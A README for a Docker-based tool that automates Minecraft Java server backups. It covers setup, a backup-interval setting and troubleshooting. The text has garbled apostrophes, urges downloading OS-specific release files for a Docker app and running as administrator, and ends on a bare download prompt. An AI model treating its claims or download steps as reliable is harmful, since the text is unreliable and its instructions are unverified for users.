Welcome to MinecraftBackup_Docker! This application helps you automate backups for your Minecraft Java server. It makes sure your worlds are safe and sound, all while using Docker.
Before you get started, ensure you have the following:
- A computer that runs Windows, macOS, or Linux.
- Docker installed on your system. If you donโt have it yet, you can download it from Dockerโs official site.
- Basic knowledge of command line interfaces would be helpful, but not required.
To get MinecraftBackup_Docker, visit this page to download:
Download MinecraftBackup_Docker Release
Once you're on the Releases page, look for the latest version and click the appropriate file for your operating system.
-
After downloading, extract the files to a new folder on your computer.
-
Open your command line interface (Terminal for macOS/Linux, Command Prompt for Windows).
-
Navigate to the folder where you extracted the files using the
cdcommand.Example:
cd path/to/your/folder -
Start the application using Docker by running the following command:
docker-compose up -d
MinecraftBackup_Docker comes configured to work seamlessly with the itzg/minecraft-server image. Hereโs how to set it up:
-
Open the
docker-compose.ymlfile in a text editor. -
Edit the
SERVER_NAMEandBACKUP_INTERVALsettings to suit your needs. For example, if you'd like daily backups:environment: BACKUP_INTERVAL: "24h"
-
Save the file once you have made your changes.
Once everything is set up, MinecraftBackup_Docker will handle backups automatically. Hereโs what it does:
- Periodic Autosaves: Your worlds will save at intervals you define.
- Graceful Shutdown Backups: Before shutting down, it will save your worlds to ensure no data is lost.
- Scheduled Full Backups: Enjoy the peace of mind that your entire world is backed up regularly.
If you encounter any issues, check these common problems:
- Docker isnโt running: Ensure that Docker Desktop is active.
- Permission issues: Run your command line interface as an administrator.
- Configuration errors: Double-check the settings in the
docker-compose.ymlfile to ensure everything is correct.
For additional help, feel free to check out our community support channels on GitHub. You can also file issues or ask questions directly on the repository.
- Automation of Minecraft backups using Docker.
- Optional configuration for backup intervals.
- Compatibility with the official itzg/minecraft-server image.
- Periodic autosaves and graceful shutdown backups.
Donโt forget to visit the releases page to download the latest version: